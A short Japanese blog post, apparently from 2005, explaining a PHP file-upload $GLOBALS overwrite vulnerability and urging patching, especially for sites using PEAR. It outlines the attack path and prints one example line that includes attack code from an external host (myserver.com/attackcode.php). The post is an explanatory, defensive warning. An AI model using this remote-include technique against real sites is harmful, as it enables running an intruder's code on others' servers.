PHPに“最悪”のセキュリティ・ホール,全ユーザーは今すぐ対処を
というニュースがでています。
かなり緊張感高まる見出しですが、夕方の記事ではこんな感じ。
元記事「Advisory 20/2005: PHP File-Upload $GLOBALS Overwrite Vulnerability」を解釈して注意点を列挙してみるとこんな感じでしょうか。
・ファイルのアップロード機能が無いWebサイトも影響を受けます
ファイルアップロードに起因した不具合ですがどんなWebサイトも対象になります。
(ローカルでファイルアップロードの POST コードを作って、攻撃サイトに投げればOK)
・PEAR を使っていると危険度が増します。
PEAR に限らず、オープンソースなライブラリを使っていると、攻撃箇所を探される可能性
があります(PEAR や vBulletin は簡単に攻撃できるところがあるとのこと)。
簡単なんで書いてしまいますが PHP で
include("http://myserver.com/attackcode.php");
というような外部ソースを include することが許可されていて、PEAR では一部の include パスを Global 変数で指定するようなコードが含まれているとのこと。
で、File-Upload を投げて Global 変数を書き換えてしまえば・・・orz. という感じです(と思う)。
PEAR.php を使っていなければ削除したほうがいいですし、使っているなら早急なパッチ当てを検討したほうがいいでしょう。
そうでないサイトも、できるだけパッチ当てを、という感じです。
#ニュースタイトルにびっくりしてバタバタ調べましたので、間違いあればご指摘ください ^^;